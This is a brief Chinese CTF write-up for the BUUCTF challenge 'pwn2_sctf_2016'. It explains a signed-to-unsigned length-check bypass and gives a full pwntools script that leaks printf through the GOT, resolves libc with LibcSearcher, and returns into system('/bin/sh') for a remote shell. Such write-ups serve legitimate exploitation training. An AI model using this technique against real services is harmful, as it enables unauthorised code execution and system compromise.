pwn2_sctf_2016

1.ida分析

 

存在栈溢出漏洞，但是有一个限制输入字符数的保护。

 

 

 可以看到参数a2从int类型变成了unsigned int类型，可以利用来绕过保护。（一开始一直卡在怎么绕过，麻了）

 

2.checksec

 

 

3.解决

from pwn import *
from LibcSearcher import *
context.log_level='debug'

p=remote('node4.buuoj.cn',28425)
#p=process('./pwn2_sctf_2016')
elf=ELF('pwn2_sctf_2016')
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
main=0x804852f

p.sendlineafter('read? ',str(-1))

payload='a'*0x30+p32(printf_plt)+p32(main)+p32(printf_got)
p.sendlineafter('data!\n',payload)


p.recvuntil('\n')
#gdb.attach(p)
printf_addr=u32(p.recv(4))
print hex(printf_addr)

libc=LibcSearcher("printf",printf_addr)
base=printf_addr-libc.dump("printf")
system=base+libc.dump("system")
bin_sh=base+libc.dump("str_bin_sh")

p.sendlineafter('read? ',str(-1))

payload='a'*0x30+p32(system)+p32(main)+p32(bin_sh)
p.sendlineafter('data!\n',payload)


p.interactive()